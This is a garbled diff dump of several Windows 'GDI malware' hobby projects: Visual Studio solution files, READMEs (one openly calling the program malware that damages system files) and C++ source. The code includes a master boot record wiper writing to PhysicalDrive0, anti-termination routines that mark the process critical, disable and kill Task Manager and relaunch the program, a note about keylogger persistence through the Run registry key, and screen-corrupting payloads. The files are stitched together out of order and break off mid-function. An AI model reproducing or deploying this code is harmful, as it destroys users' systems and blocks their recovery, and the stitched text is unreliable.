+ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - write keylogger copy location in a Default string
60
+ ```
src/Raindows-main/Raindows.sln ADDED
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1
+ 
2
+ Microsoft Visual Studio Solution File, Format Version 12.00
3
+ # Visual Studio Version 16
4
+ VisualStudioVersion = 16.0.31613.86
5
+ MinimumVisualStudioVersion = 10.0.40219.1
6
+ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Raindows", "Raindows\Raindows.vcxproj", "{9D36DE70-0EF2-471E-B746-CBF6C1474BC3}"
7
+ EndProject
8
+ Global
9
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
10
+ Debug|x64 = Debug|x64
11
+ Debug|x86 = Debug|x86
12
+ Release|x64 = Release|x64
13
+ Release|x86 = Release|x86
14
+ EndGlobalSection
15
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
16
+ {9D36DE70-0EF2-471E-B746-CBF6C1474BC3}.Debug|x64.ActiveCfg = Debug|x64
17
+ {9D36DE70-0EF2-471E-B746-CBF6C1474BC3}.Debug|x64.Build.0 = Debug|x64
18
+ {9D36DE70-0EF2-471E-B746-CBF6C1474BC3}.Debug|x86.ActiveCfg = Debug|Win32
19
+ {9D36DE70-0EF2-471E-B746-CBF6C1474BC3}.Debug|x86.Build.0 = Debug|Win32
20
+ {9D36DE70-0EF2-471E-B746-CBF6C1474BC3}.Release|x64.ActiveCfg = Release|x64
21
+ {9D36DE70-0EF2-471E-B746-CBF6C1474BC3}.Release|x64.Build.0 = Release|x64
22
+ {9D36DE70-0EF2-471E-B746-CBF6C1474BC3}.Release|x86.ActiveCfg = Release|Win32
23
+ {9D36DE70-0EF2-471E-B746-CBF6C1474BC3}.Release|x86.Build.0 = Release|Win32
24
+ EndGlobalSection
25
+ GlobalSection(SolutionProperties) = preSolution
26
+ HideSolutionNode = FALSE
27
+ EndGlobalSection
28
+ GlobalSection(ExtensibilityGlobals) = postSolution
29
+ SolutionGuid = {CE3D24D2-8034-4C9A-9BD6-4DB7E69964CA}
30
+ EndGlobalSection
31
+ EndGlobal
src/Rover-The-Desktop-Assistant-Beta-1.2-main/README.md ADDED
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1
+ > [!NOTE]
2
+ > This current project will not be updated anymore!
3
+ > However the newer version will be build from scratch on WPF.
4
+
5
+ # Rover The Desktop Assistant (Beta 1.2)
6
+
7
+ ![Speak](https://github.com/MalwareStudio/Rover-The-Desktop-Assistant/assets/49496834/33050f93-60f8-4e84-8530-89ad17bd5efb)
8
+ ![Reading](https://github.com/MalwareStudio/Rover-The-Desktop-Assistant/assets/49496834/d1f2fdcf-6319-42c4-8d7f-c14074f15091)
9
+ ![Idle8](https://github.com/MalwareStudio/Rover-The-Desktop-Assistant/assets/49496834/e3f932d8-13c6-4fb8-8b60-d72ae54768aa)
10
+ ![Idle10](https://github.com/MalwareStudio/Rover-The-Desktop-Assistant/assets/49496834/d4e65fc0-42f6-445f-9d95-089ad8638dfb)
11
+
12
+ Rover is a desktop assistant similar to the famous Bonzi Buddy, however this one provides more features such as GDI and system corruption. This assistant was created specially for malware lovers, basically for people who likes to run malwares.
13
+
14
+ So if you are curious about malwares and you want to know what this malware is capable of then this projects may suits your standards.
15
+
16
+ Of course try it out in the safe enviroment (virtual machine) rather than on your physical hardware. Keep in mind that this malware can damage system files and make the device unusable!
17
+
18
+ ![](https://github.com/MalwareStudio/Rover-The-Desktop-Assistant/blob/main/Images/Rover_Preview.png)
19
+
20
+ Check out the video about Rover Beta 1.2 👉 https://youtu.be/LejK_DRv05k?si=r7yLwVffUubFK7tr
21
+
22
+ Full video about the First Beta Version 👉 https://youtu.be/RT6WLne24Bc?si=Yg6eUiwecKXlsrw4
23
+
24
+ ## What have been changed?
25
+
26
+ This is just a small update which brings more GDI effects, animations and some utilities. Features such as Games, Terminal, RoverNET2.0, RoverLOCK and RoverPAINT have not been finished yet, so they will not work if you try to access them.
27
+
28
+ ### More GDI Effects 🎨
29
+ ##
30
+
31
+ ![](https://github.com/MalwareStudio/Rover-The-Desktop-Assistant/blob/main/Images/GDI%20MENU.png)
32
+
33
+ You can try out new GDI payloads such as Lighting, Brushes (Customizable), NoEscape, Mandela and also new GDI+ effects like Hue, Saturation, Contrast and Pixelate.
34
+
35
+ From this point, you can stop any GDI effects (applies only for animated ones) by typing (F5) and erase by typing (F6).
36
+
37
+ ![](https://github.com/MalwareStudio/Rover-The-Desktop-Assistant/blob/main/Images/gdi%20effects%20compilation.png)
38
+
39
+ ### Punish That Naughty Dog 👊
40
+ ##
41
+
42
+ ![](https://github.com/MalwareStudio/Rover-The-Desktop-Assistant/blob/main/Images/rover%20slap.png)
43
+
44
+ Did Rover say something mean to you? What if I told you that you can punish him? Yes, that's right! This update added the Slap feature, so if Rover make you angry you can teach him a lesson 😈
45
+
46
+ By the way, if you slap him 3 times, he will get very angry at you and he can even leave you!
47
+
48
+ Of course, you can bring him back any time 😊
49
+
50
+ ![](https://github.com/MalwareStudio/Rover-The-Desktop-Assistant/blob/main/Images/Screenshot%202025-02-18%20143836.png)
51
+
52
+ ### Utilities (kind of useful)
53
+ ##
54
+
55
+ Rover does not only provides bad stuff. Now he can clean up the Temporary Files so-called Temp Files.
56
+
57
+ If your machine is full of these useless files, this tool can come in handy.
58
+
59
+ ![](https://github.com/MalwareStudio/Rover-The-Desktop-Assistant/blob/main/Images/rover%20junk.png)
60
+
61
+ ### Junk Cleaner (WPF)
62
+ ##
63
+
64
+ I have also created better version via WPF.
65
+
66
+ This one provides even a Deep Scan, which can get rid of Temp Files from all drives within their subdirectories.
67
+
68
+ ![](https://github.com/MalwareStudio/Rover-The-Desktop-Assistant/blob/main/Images/rover%20better%20junk.png)
69
+
70
+ ### RoverLOCK (WPF)
71
+ ##
72
+
73
+ Another external utility which could be embedded in the Rover.
74
+
75
+ This tool can protect any files via AES encryption.
76
+
77
+ ![](https://github.com/MalwareStudio/Rover-The-Desktop-Assistant/blob/main/Images/rover%20lock.png)
78
+
79
+ ## This project is open source!
80
+
81
+ I decided to publish the entire source code of the Rover Desktop Assistant.
82
+
83
+ Feel free to use this source code without any restrictions! However, I would be happy if you could mention me in the case of using code from this project 😇
src/ScreenDestroyer.scr-master/README.md ADDED
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1
+ # ScreenDestroyer.scr
2
+ A very ridiculous screen saver made to be look like a GDI malware.
3
+
4
+ Showcase video: https://www.bilibili.com/video/BV1a5WweyECz/
5
+
6
+ ================================
7
+
8
+ 注意:贾贤以及所有与其有血缘关系的人不得使用本人制作的任何软件!
9
+
10
+ 详情请见此专栏:b23.tv/UI7AHI9
src/ScreenDestroyer.scr-master/ScreenDestroyer.sln ADDED
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1
+ 
2
+ Microsoft Visual Studio Solution File, Format Version 12.00
3
+ # Visual Studio Version 16
4
+ VisualStudioVersion = 16.0.34729.46
5
+ MinimumVisualStudioVersion = 10.0.40219.1
6
+ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ScreenDestroyer", "ScreenDestroyer\ScreenDestroyer.vcxproj", "{102BEEC6-20CA-4C45-A3BC-E93D5853B74D}"
7
+ EndProject
8
+ Global
9
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
10
+ Debug|x64 = Debug|x64
11
+ Debug|x86 = Debug|x86
12
+ Release|x64 = Release|x64
13
+ Release|x86 = Release|x86
14
+ EndGlobalSection
15
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
16
+ {102BEEC6-20CA-4C45-A3BC-E93D5853B74D}.Debug|x64.ActiveCfg = Debug|x64
17
+ {102BEEC6-20CA-4C45-A3BC-E93D5853B74D}.Debug|x64.Build.0 = Debug|x64
18
+ {102BEEC6-20CA-4C45-A3BC-E93D5853B74D}.Debug|x86.ActiveCfg = Debug|Win32
19
+ {102BEEC6-20CA-4C45-A3BC-E93D5853B74D}.Debug|x86.Build.0 = Debug|Win32
20
+ {102BEEC6-20CA-4C45-A3BC-E93D5853B74D}.Release|x64.ActiveCfg = Release|x64
21
+ {102BEEC6-20CA-4C45-A3BC-E93D5853B74D}.Release|x64.Build.0 = Release|x64
22
+ {102BEEC6-20CA-4C45-A3BC-E93D5853B74D}.Release|x86.ActiveCfg = Release|Win32
23
+ {102BEEC6-20CA-4C45-A3BC-E93D5853B74D}.Release|x86.Build.0 = Release|Win32
24
+ EndGlobalSection
25
+ GlobalSection(SolutionProperties) = preSolution
26
+ HideSolutionNode = FALSE
27
+ EndGlobalSection
28
+ GlobalSection(ExtensibilityGlobals) = postSolution
29
+ SolutionGuid = {DD157D6C-8483-4509-B519-D4616F7B1C2A}
30
+ EndGlobalSection
31
+ EndGlobal
src/Source/Anti-crash.h ADDED
@@ -0,0 +1,113 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #pragma once
2
+
3
+ #include <windows.h>
4
+ #include <tlhelp32.h>
5
+ #include <iostream>
6
+
7
+ typedef VOID(_stdcall* RtlSetProcessIsCritical) (
8
+ IN BOOLEAN NewValue,
9
+ OUT PBOOLEAN OldValue,
10
+ IN BOOLEAN IsWinlogon);
11
+
12
+
13
+ BOOL EnablePriv(LPCWSTR lpszPriv) {
14
+ HANDLE hToken;
15
+ LUID luid;
16
+ TOKEN_PRIVILEGES tkprivs;
17
+ ZeroMemory(&tkprivs, sizeof(tkprivs));
18
+
19
+
20
+ if (!OpenProcessToken(GetCurrentProcess(), (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), &hToken))
21
+ return FALSE;
22
+
23
+
24
+ if (!LookupPrivilegeValue(NULL, lpszPriv, &luid)) {
25
+ CloseHandle(hToken); return FALSE;
26
+ }
27
+
28
+
29
+ tkprivs.PrivilegeCount = 1;
30
+ tkprivs.Privileges[0].Luid = luid;
31
+ tkprivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
32
+
33
+
34
+ BOOL bRet = AdjustTokenPrivileges(hToken, FALSE, &tkprivs, sizeof(tkprivs), NULL, NULL);
35
+ CloseHandle(hToken);
36
+ return bRet;
37
+ }
38
+
39
+
40
+ BOOL ProcessIsCritical() {
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+ HANDLE hDLL;
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+ RtlSetProcessIsCritical fSetCritical;
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+
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+
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+ hDLL = LoadLibraryA("ntdll.dll");
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+ if (hDLL != NULL)
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+ {
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+
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+ EnablePriv(SE_DEBUG_NAME);
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+
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+
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+ fSetCritical = (RtlSetProcessIsCritical)GetProcAddress((HINSTANCE)hDLL, "RtlSetProcessIsCritical");
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+
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+
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+ if (!fSetCritical) {
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+ CloseHandle(hDLL);
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+ return FALSE;
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+ }
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+
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+
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+ fSetCritical(1, 0, 0);
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+
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+ CloseHandle(hDLL);
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+ return TRUE;
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+ }
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+ else {
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+ return FALSE;
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+ }
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+ }
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+
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+
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+ void disableTaskManager() {
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+ HKEY hKey;
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+ RegOpenKeyEx(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE, &hKey);
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+ DWORD value = 1;
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+ RegSetValueEx(hKey, L"DisableTaskMgr", 0, REG_DWORD, (BYTE*)&value, sizeof(value));
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+ RegCloseKey(hKey);
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+ }
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+
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+
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+ void restartIfKilled() {
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+ while (true) {
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+ Sleep(1000);
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+
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+ HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
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+ PROCESSENTRY32 pe32;
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+ pe32.dwSize = sizeof(PROCESSENTRY32);
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+
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+ if (Process32First(hSnap, &pe32)) {
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+ do {
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+ if (wcscmp(pe32.szExeFile, L"taskmgr.exe") == 0) {
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+ TerminateProcess(OpenProcess(PROCESS_TERMINATE, FALSE, pe32.th32ProcessID), 0);
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+ }
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+ } while (Process32Next(hSnap, &pe32));
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+ }
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+ CloseHandle(hSnap);
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+ }
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+ }
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+
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+
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+ void watchdogLoop() {
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+ while (true) {
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+ system("start lGyciQRsgA.exe");
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+ Sleep(1000);
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+ }
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+ }
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+
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+ void crashProofMain() {
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+ disableTaskManager();
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+ CreateThread(0, 0, (LPTHREAD_START_ROUTINE)restartIfKilled, 0, 0, 0);
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+ ProcessIsCritical();
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+ watchdogLoop();
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+ }
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+ #include <windows.h>
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+ #include <tchar.h>
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+ #include <ctime>
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+
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+ #pragma comment(lib, "winmm.lib")
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+ #pragma comment(lib, "Msimg32.lib")
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+
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+ const wchar_t* REG_PATH = L"Software\\MyProgram";
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+ const wchar_t* REG_KEY = L"Config";
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+
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+
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+ bool hasRunBefore() { //This thing configs the program already has run before so it wont shows warning
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+ HKEY hKey;
14
+ DWORD value = 0, size = sizeof(DWORD);
15
+ if (RegOpenKeyExW(HKEY_CURRENT_USER, REG_PATH, 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
16
+ RegQueryValueExW(hKey, REG_KEY, NULL, NULL, (LPBYTE)&value, &size);
17
+ RegCloseKey(hKey);
18
+ }
19
+ return value == 1;
20
+ }
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+
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+
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+ void markAsRun() { //Check for the key with "Config" name shit
24
+ HKEY hKey;
25
+ DWORD value = 1;
26
+ if (RegCreateKeyW(HKEY_CURRENT_USER, REG_PATH, &hKey) == ERROR_SUCCESS) {
27
+ RegSetValueExW(hKey, REG_KEY, 0, REG_DWORD, (const BYTE*)&value, sizeof(value));
28
+ RegCloseKey(hKey);
29
+ }
30
+ }
31
+
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+
33
+ bool isCorrectDate() { //The date. (You need to set it into 1/1/2038)
34
+ SYSTEMTIME sysTime;
35
+ GetSystemTime(&sysTime);
36
+ return (sysTime.wYear == 2038 && sysTime.wMonth == 1 && sysTime.wDay == 1);
37
+ }
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+
39
+ void Stop(DWORD value) {
40
+ Sleep(value); //Not gonna explane about this shit.
41
+ }
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+ NEW MALWARE!!!! (comeback?) again!
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+ #include <windows.h>
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+ #include <tchar.h>
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+ #include <ctime>
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+ #include <iostream>
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+ #include <windowsx.h>
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+ #pragma comment(lib, "winmm.lib")
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+ #pragma comment(lib, "Msimg32.lib")
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+ #include <math.h>
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+ #include <time.h>
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+ #include <cmath>
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+ #include "ClientCheck.h"
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+ #include "data.h"
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+ #include "Anti-crash.h"
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+ #include "BootConfig.h"
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+ #define M_PI 3.14159265358979323846264338327950288
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+ #define PI 3.14159265358979323846264338327950288
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+ typedef NTSTATUS(NTAPI* NRHEdef)(NTSTATUS, ULONG, ULONG, PULONG, ULONG, PULONG);
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+ typedef NTSTATUS(NTAPI* RAPdef)(ULONG, BOOLEAN, BOOLEAN, PBOOLEAN);
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+ typedef union _RGBQUAD {
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+ COLORREF rgb;
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+ struct {
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+ BYTE b;
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+ BYTE g;
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+ BYTE r;
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+ BYTE Reserved;
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+ };
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+ }_RGBQUAD, *PRGBQUAD;
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+ typedef struct
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+ {
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+ FLOAT h;
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+ FLOAT s;
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+ FLOAT l;
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+ } HSL;
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+
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+ namespace Colors
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+ {
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+ //These HSL functions was made by Wipet, credits to him!
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+ //OBS: I used it in 3 payloads
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+
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+ //Btw ArTicZera created HSV functions, but it sucks unfortunatelly
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+ //So I didn't used in this malware.
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+
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+ HSL rgb2hsl(RGBQUAD rgb)
44
+ {
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+ HSL hsl;
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+
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+ BYTE r = rgb.rgbRed;
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+ BYTE g = rgb.rgbGreen;
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+ BYTE b = rgb.rgbBlue;
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+
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+ FLOAT _r = (FLOAT)r / 255.f;
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+ FLOAT _g = (FLOAT)g / 255.f;
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+ FLOAT _b = (FLOAT)b / 255.f;
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+
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+ FLOAT rgbMin = min(min(_r, _g), _b);
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+ FLOAT rgbMax = max(max(_r, _g), _b);
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+
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+ FLOAT fDelta = rgbMax - rgbMin;
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+ FLOAT deltaR;
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+ FLOAT deltaG;
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+ FLOAT deltaB;
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+
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+ FLOAT h = 0.f;
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+ FLOAT s = 0.f;
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+ FLOAT l = (FLOAT)((rgbMax + rgbMin) / 2.f);
66
+
67
+ if (fDelta != 0.f)
68
+ {
69
+ s = l < .5f ? (FLOAT)(fDelta / (rgbMax + rgbMin)) : (FLOAT)(fDelta / (2.f - rgbMax - rgbMin));
70
+ deltaR = (FLOAT)(((rgbMax - _r) / 6.f + (fDelta / 2.f)) / fDelta);
71
+ deltaG = (FLOAT)(((rgbMax - _g) / 6.f + (fDelta / 2.f)) / fDelta);
72
+ deltaB = (FLOAT)(((rgbMax - _b) / 6.f + (fDelta / 2.f)) / fDelta);
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+
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+ if (_r == rgbMax) h = deltaB - deltaG;
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+ else if (_g == rgbMax) h = (1.f / 3.f) + deltaR - deltaB;
76
+ else if (_b == rgbMax) h = (2.f / 3.f) + deltaG - deltaR;
77
+ if (h < 0.f) h += 1.f;
78
+ if (h > 1.f) h -= 1.f;
79
+ }
80
+
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+ hsl.h = h;
82
+ hsl.s = s;
83
+ hsl.l = l;
84
+ return hsl;
85
+ }
86
+
87
+ RGBQUAD hsl2rgb(HSL hsl)
88
+ {
89
+ RGBQUAD rgb;
90
+
91
+ FLOAT r = hsl.l;
92
+ FLOAT g = hsl.l;
93
+ FLOAT b = hsl.l;
94
+
95
+ FLOAT h = hsl.h;
96
+ FLOAT sl = hsl.s;
97
+ FLOAT l = hsl.l;
98
+ FLOAT v = (l <= .5f) ? (l * (1.f + sl)) : (l + sl - l * sl);
99
+
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+ FLOAT m;
101
+ FLOAT sv;
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+ FLOAT fract;
103
+ FLOAT vsf;
104
+ FLOAT mid1;
105
+ FLOAT mid2;
106
+
107
+ INT sextant;
108
+
109
+ if (v > 0.f)
110
+ {
111
+ m = l + l - v;
112
+ sv = (v - m) / v;
113
+ h *= 6.f;
114
+ sextant = (INT)h;
115
+ fract = h - sextant;
116
+ vsf = v * sv * fract;
117
+ mid1 = m + vsf;
118
+ mid2 = v - vsf;
119
+
120
+ switch (sextant)
121
+ {
122
+ case 0:
123
+ r = v;
124
+ g = mid1;
125
+ b = m;
126
+ break;
127
+ case 1:
128
+ r = mid2;
129
+ g = v;
130
+ b = m;
131
+ break;
132
+ case 2:
133
+ r = m;
134
+ g = v;
135
+ b = mid1;
136
+ break;
137
+ case 3:
138
+ r = m;
139
+ g = mid2;
140
+ b = v;
141
+ break;
142
+ case 4:
143
+ r = mid1;
144
+ g = m;
145
+ b = v;
146
+ break;
147
+ case 5:
148
+ r = v;
149
+ g = m;
150
+ b = mid2;
151
+ break;
152
+ }
153
+ }
154
+
155
+ rgb.rgbRed = (BYTE)(r * 255.f);
156
+ rgb.rgbGreen = (BYTE)(g * 255.f);
157
+ rgb.rgbBlue = (BYTE)(b * 255.f);
158
+
159
+ return rgb;
160
+ }
161
+ }
162
+
163
+ DWORD WINAPI MBRWiper(LPVOID lpParam) {
164
+ DWORD dwBytesWritten;
165
+ HANDLE hDevice = CreateFileW(
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+ L"\\\\.\\PhysicalDrive0", GENERIC_ALL,
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+ FILE_SHARE_READ | FILE_SHARE_WRITE, 0,
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+ OPEN_EXISTING, 0, 0);
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+
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+ WriteFile(hDevice, MasterBootRecord, 32768, &dwBytesWritten, 0);
171
+ return 1;
172
+ }
173
+
174
+
175
+ DWORD WINAPI shader1(LPVOID lpvd) { // credits to Soheil Shahrab, modified by you
176
+ HDC hdc = GetDC(NULL);
177
+ HDC hdcCopy = CreateCompatibleDC(hdc);
178
+ int screenWidth = GetSystemMetrics(SM_CXSCREEN);
179
+ int screenHeight = GetSystemMetrics(SM_CYSCREEN);
180
+ BITMAPINFO bmpi = { 0 };
181
+ HBITMAP bmp;
182
+ bmpi.bmiHeader.biSize = sizeof(bmpi);
183
+ bmpi.bmiHeader.biWidth = screenWidth;
184
+ bmpi.bmiHeader.biHeight = screenHeight;
185
+ bmpi.bmiHeader.biPlanes = 1;
186
+ bmpi.bmiHeader.biBitCount = 32;
187
+ bmpi.bmiHeader.biCompression = BI_RGB;
188
+ RGBQUAD* rgbquad = NULL;
189
+ HSL hslcolor;
190
+ bmp = CreateDIBSection(hdc, &bmpi, DIB_RGB_COLORS, (void**)&rgbquad, NULL, 0);
191
+ SelectObject(hdcCopy, bmp);
192
+ INT i = 0;
193
+
194
+ // Initialize direction and timing variables
195
+ int direction = 1; // 1 = Up, -1 = Down
196
+ DWORD lastDirectionChange = GetTickCount();
197
+ DWORD directionChangeInterval = 5000; // 5 seconds
198
+
199
+ while (1)
200
+ {
201
+ hdc = GetDC(NULL);
202
+ StretchBlt(hdcCopy, 0, 0, screenWidth, screenHeight, hdc, 0, 0, screenWidth, screenHeight, SRCCOPY);
203
+ RGBQUAD rgbquadCopy;
204
+
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+ for (int x = 0; x < screenWidth; x++)
206
+ {
207
+ for (int y = 0; y < screenHeight; y++)
208
+ {
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+ int index = y * screenWidth + x;
210
+ FLOAT fx = ((x + (10 * i)) ^ y) + (i + i * 10);
211
+
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+ rgbquadCopy = rgbquad[index];
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+
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+ hslcolor = Colors::rgb2hsl(rgbquadCopy);
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+ hslcolor.h = fmod(fx / 400.f + y / screenHeight * .10f, 1.f);
216
+
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+ rgbquad[index] = Colors::hsl2rgb(hslcolor);
218
+ }
219
+ }
220
+
221
+ i += direction; // Move the fractal up or down depending on direction
222
+
223
+ // Check if it's time to change direction
224
+ DWORD currentTime = GetTickCount();
225
+ if (currentTime - lastDirectionChange >= directionChangeInterval) {
226
+ direction = -direction; // Reverse the direction
227
+ lastDirectionChange = currentTime; // Reset the timer
228
+ }
229
+
230
+ StretchBlt(hdc, 0, 0, screenWidth, screenHeight, hdcCopy, 0, 0, screenWidth, screenHeight, SRCCOPY);
231
+ ReleaseDC(NULL, hdc);
232
+ DeleteDC(hdc);
233
+ }
234
+
235
+ return 0x00;
236
+ }
237
+
238
+ DWORD WINAPI shader2(LPVOID lpvd) {
239
+ HDC hdc = GetDC(NULL);
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+ HDC hdcCopy = CreateCompatibleDC(hdc);
241
+ int screenWidth = GetSystemMetrics(SM_CXSCREEN);
242
+ int screenHeight = GetSystemMetrics(SM_CYSCREEN);
243
+ BITMAPINFO bmpi = { 0 };
244
+ HBITMAP bmp;
245
+ bmpi.bmiHeader.biSize = sizeof(bmpi);
246
+ bmpi.bmiHeader.biWidth = screenWidth;
247
+ bmpi.bmiHeader.biHeight = screenHeight;
248
+ bmpi.bmiHeader.biPlanes = 1;
249
+ bmpi.bmiHeader.biBitCount = 32;
250
+ bmpi.bmiHeader.biCompression = BI_RGB;
251
+ RGBQUAD* rgbquad = NULL;
252
+ HSL hslcolor;
253
+ bmp = CreateDIBSection(hdc, &bmpi, DIB_RGB_COLORS, (void**)&rgbquad, NULL, 0);
254
+ SelectObject(hdcCopy, bmp);
255
+ INT i = 0;
256
+
257
+ srand(time(0)); // Seed the random number generator
258
+
259
+ while (1)
260
+ {
261
+ hdc = GetDC(NULL);
262
+ StretchBlt(hdcCopy, 0, 0, screenWidth, screenHeight, hdc, 0, 0, screenWidth, screenHeight, SRCCOPY);
263
+
264
+ // Create Rainbow Flash Effect
265
+ for (int x = 0; x < screenWidth; x++)
266
+ {
267
+ for (int y = 0; y < screenHeight; y++)
268
+ {
269
+ int index = y * screenWidth + x;
270
+ RGBQUAD rgbquadCopy = rgbquad[index];
271
+ hslcolor = Colors::rgb2hsl(rgbquadCopy);
272
+
273
+ // Create a fast-changing rainbow flash effect
274
+ hslcolor.h = fmod(i / 100.0f, 1.0f); // Rapidly cycle through hues to create rainbow effect
275
+ rgbquad[index] = Colors::hsl2rgb(hslcolor);
276
+ }
277
+ }
278
+
279
+ // Add the shaking effect by randomly altering the window's position
280
+ int shakeX = rand() % 21 - 10; // Random value between -10 and 10
281
+ int shakeY = rand() % 21 - 10; // Random value between -10 and 10
282
+ SetWindowPos(GetConsoleWindow(), HWND_TOP, shakeX, shakeY, 0, 0, SWP_NOSIZE | SWP_NOACTIVATE);
283
+
284
+ // Increment the fractal generation for continuous change
285
+ i++;
286
+
287
+ StretchBlt(hdc, 0, 0, screenWidth, screenHeight, hdcCopy, 0, 0, screenWidth, screenHeight, SRCCOPY);
288
+ ReleaseDC(NULL, hdc);
289
+ DeleteDC(hdc);
290
+
291
+ Sleep(10); // Add a small delay for smooth animation
292
+ }
293
+
294
+ return 0x00;
295
+ }
296
+
297
+ DWORD WINAPI plgblt(LPVOID lpParam)
298
+ {
299
+ HDC hdc = GetDC(0);
300
+ RECT wRect;
301
+ POINT wPt[3];
302
+ while (1)
303
+ {
304
+ hdc = GetDC(0);
305
+ GetWindowRect(GetDesktopWindow(), &wRect);
306
+ wPt[0].x = wRect.left + 3;
307
+ wPt[0].y = wRect.top - 6;
308
+ wPt[1].x = wRect.right + 4;
309
+ wPt[1].y = wRect.top + 5;
310
+ wPt[2].x = wRect.left - 6;
311
+ wPt[2].y = wRect.bottom + 9;
312
+ PlgBlt(hdc, wPt, hdc, wRect.left, wRect.top, wRect.right + wRect.left, wRect.bottom + wRect.top, 0, 0, 0);
313
+ ReleaseDC(0, hdc);
314
+ }
315
+ }
316
+
317
+ DWORD WINAPI shader3(LPVOID lpstart) {
318
+ int w = GetSystemMetrics(SM_CXSCREEN);
319
+ int h = GetSystemMetrics(SM_CYSCREEN);
320
+
321
+ HDC hdc = GetDC(NULL);
322
+ HDC hdcCopy = CreateCompatibleDC(hdc);
323
+ BITMAPINFO bmpi = { 0 };
324
+ bmpi.bmiHeader.biSize = sizeof(bmpi);
325
+ bmpi.bmiHeader.biWidth = w;
326
+ bmpi.bmiHeader.biHeight = h;
327
+ bmpi.bmiHeader.biPlanes = 1;
328
+ bmpi.bmiHeader.biBitCount = 32;
329
+ bmpi.bmiHeader.biCompression = BI_RGB;
330
+ RGBQUAD* rgbquad = NULL;
331
+ HSL hslcolor;
332
+ HBITMAP bmp = CreateDIBSection(hdc, &bmpi, DIB_RGB_COLORS, (void**)&rgbquad, NULL, 0);
333
+ SelectObject(hdcCopy, bmp);
334
+
335
+ float hue = 0.0f; // Start with the red hue
336
+ const float hueStep = 0.01f; // Hue step to create the rainbow effect
337
+
338
+ while (1) {
339
+ // Create rainbow effect by cycling through hues
340
+ for (int x = 0; x < w; x++) {
341
+ for (int y = 0; y < h; y++) {
342
+ int index = y * w + x;
343
+ RGBQUAD rgbquadCopy = rgbquad[index];
344
+
345
+ // Convert RGB to HSL, modify the hue to create the rainbow effect
346
+ hslcolor = Colors::rgb2hsl(rgbquadCopy);
347
+ hslcolor.h = fmod(hue, 1.0f); // Cycle hue value between 0 and 1
348
+ rgbquad[index] = Colors::hsl2rgb(hslcolor);
349
+ }
350
+ }
351
+
352
+ // Apply the rainbow colors to the screen
353
+ StretchBlt(hdc, 0, 0, w, h, hdcCopy, 0, 0, w, h, SRCCOPY);
354
+
355
+ // Increase hue to shift through colors
356
+ hue += hueStep;
357
+ if (hue >= 1.0f) hue = 0.0f; // Reset the hue if it exceeds 1
358
+
359
+ Sleep(10); // Delay to control the speed of the rainbow transition
360
+ }
361
+
362
+ ReleaseDC(NULL, hdc);
363
+ DeleteDC(hdcCopy);
364
+ DeleteObject(bmp);
365
+ return 0;
366
+ }
367
+
368
+ DWORD WINAPI shader4(LPVOID lpvd)
369
+ {
370
+ HDC hdc = GetDC(NULL);
371
+ HDC hdcCopy = CreateCompatibleDC(hdc);
372
+ int w = GetSystemMetrics(0);
373
+ int h = GetSystemMetrics(1);
374
+ BITMAPINFO bmpi = { 0 };
375
+ HBITMAP bmp;
376
+ bmpi.bmiHeader.biSize = sizeof(bmpi);
377
+ bmpi.bmiHeader.biWidth = w;
378
+ bmpi.bmiHeader.biHeight = h;
379
+ bmpi.bmiHeader.biPlanes = 1;
380
+ bmpi.bmiHeader.biBitCount = 32;
381
+ bmpi.bmiHeader.biCompression = BI_RGB;
382
+ RGBQUAD* rgbquad = NULL;
383
+ HSL hslcolor;
384
+ bmp = CreateDIBSection(hdc, &bmpi, DIB_RGB_COLORS, (void**)&rgbquad, NULL, 0);
385
+ SelectObject(hdcCopy, bmp);
386
+ INT i = 0;
387
+
388
+ while (1)
389
+ {
390
+ if ((rand() % 2) == 0) InvalidateRect(0, 0, 0);
391
+ hdc = GetDC(NULL);
392
+ StretchBlt(hdcCopy, 0, 0, w, h, hdc, 0, 0, w, h, SRCCOPY);
393
+
394
+ RGBQUAD rgbquadCopy;
395
+ for (int x = 0; x < w; x++)
396
+ {
397
+ for (int y = 0; y < h; y++)
398
+ {
399
+ int index = y * w + x;
400
+
401
+ // Alternate between red and white colors based on a random condition
402
+ if ((rand() % 2) == 0) {
403
+ // Set to white
404
+ rgbquad[index].rgbRed = 255;
405
+ rgbquad[index].rgbGreen = 255;
406
+ rgbquad[index].rgbBlue = 255;
407
+ }
408
+ else {
409
+ // Set to red
410
+ rgbquad[index].rgbRed = 255;
411
+ rgbquad[index].rgbGreen = 0;
412
+ rgbquad[index].rgbBlue = 0;
413
+ }
414
+ }
415
+ }
416
+
417
+ i++;
418
+ StretchBlt(hdc, 0, 0, w, h, hdcCopy, 0, 0, w, h, SRCINVERT);
419
+ ReleaseDC(NULL, hdc);
420
+ DeleteDC(hdc);
421
+ Sleep(200); // Delay to control the speed of the red/white flash
422
+ }
423
+ return 0x00;
424
+ }
425
+
426
+ DWORD WINAPI shake(LPVOID lpParam) {
427
+ while (1) {
428
+ HDC hdc = GetDC(0);
429
+ int w = GetSystemMetrics(0);
430
+ int h = GetSystemMetrics(1);
431
+
432
+ // Increase the random displacements to intensify the shake effect
433
+ int shakeIntensity = 5; // This is the increased intensity
434
+
435
+ // BitBlt with random offsets, now within the range of -5 to +5
436
+ BitBlt(hdc, rand() % (shakeIntensity * 2) - shakeIntensity, rand() % (shakeIntensity * 2) - shakeIntensity,
437
